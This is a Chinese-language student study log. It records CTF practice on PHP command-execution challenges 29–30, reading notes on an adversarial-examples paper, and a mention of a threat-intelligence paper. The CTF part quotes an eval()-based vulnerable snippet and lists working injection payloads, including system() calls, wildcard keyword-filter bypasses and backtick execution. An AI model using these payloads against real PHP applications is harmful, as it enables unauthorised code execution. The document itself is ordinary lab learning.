G1D11-CTF启程@命令执行29-30&课内论文&Automatic Mapping of Unstructured Cyber Threat Intelligence: An Experimen

----1522电脑到啦~~check完，先学习，有时间的时候再继续下软件

一、CTF

1、学习php漏洞

（1）开发环境搭建
先粗看了一遍课程，用了几个听过很多遍的工具，因为是二倍速，所以有些目的没听清，一会拿到新电脑，验完机后，可以自己实践一下！

2、刷题

（1）29

刚刚下载了Hackbar

#屏蔽错误
error_reporting(0);
if(isset($_GET['c'])){
#拿到c
    $c = $_GET['c'];
    #如果没有flag，则代码执行c
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

梳理一下可执行代码：
1、?c=phpinfo();
2、?c=system(‘ls’);
!!!别忘了;
3、因为过滤了关键字，所以不能用file_get_content()【我感觉也可以嘿嘿】，该用shell命令——
?c=system(‘cp fla?.php 1.txt’),因为过滤了flag，所以可以用占位符

4、顺便看下preg_match()函数

if(!preg_match("/flag/i", $c)){
        eval($c);
    } 

i代表大小写不敏感

再做一道~

（2）30

这题不让用system了，这可怎么办嗯？？？

1、用··反引号，在php中和system是相同的，试一下
2、但是不能·ls·，不管用emmm
3、试试Doraemon的方法~
（1）?c=print_r(scandir(‘.’));
（2）?c=echo(ls);
（3）?c=var_dump(ls);
我知道啦~··可以代替system（），直接用system的时候不用print，用··需要print。

二、课内文献阅读

再读一下论文，找一下问题~
找不到之前的问题了，以后日后问题要放在固定的地方留存，以防找不到。
那接下来花20分钟，再读一下！

（一）回忆输出

1、提出了两个神经网络的两个特性:(1)语义空间不在某一个unit上（2）可生成差异很小，但会让分类产生错误的对抗样本。以有理数和无理数举例，训练样本就像无理数，对抗样本就像有理数；训练的样本为无理数，所以模型只能有效识别无理数；虽然无理数和有理数很近，但是二者性质截然不同，放入有理数，模型会分类错误。
语义空间是什么？其对应英文是什么？
2、对抗样本生成方法
（1)扰动尽可能小
（2）分类错误
具体公式忘记了，需查看
3、实验设计
（1）最大激活某个神经单元和一组神经单元混合的图片，性质相同
（2）将根据某个模型生成的对抗样本，应用到其他超参数模型，或者其他数据集训练出的模型上，仍旧有效。
样本除了具有的跨模型适用性外，还具有什么适用性？

（二）需解决问题

1、语义信息是什么？其对应英文是什么？
semantic infomation，感觉就像提取出来的特征。
2、得知语义信息在整个空间中，对我们有什么帮助？

3、对抗样本生成具体公式忘记了，需查看

4、样本除了具有的跨模型适用性外，还具有什么适用性？
跨训练集的适用性，使用另一份训练集（分布不同）训练出来的模型也会被骗。

5、有理数无理数的比喻是如何描述的？

6、对抗学习可以提高模型准确度？文中有提到吗？是如何解释的？

三、APT论文阅读

-----------2112
两个电脑不知道怎么分配，先继续读一下文献hh,不能拖ddl

(一）Automatic Mapping of Unstructured Cyber Threat

Intelligence: An Experimental Study
啊啊啊，一篇没读完，有点注意力不集中了。感觉这篇写的一般。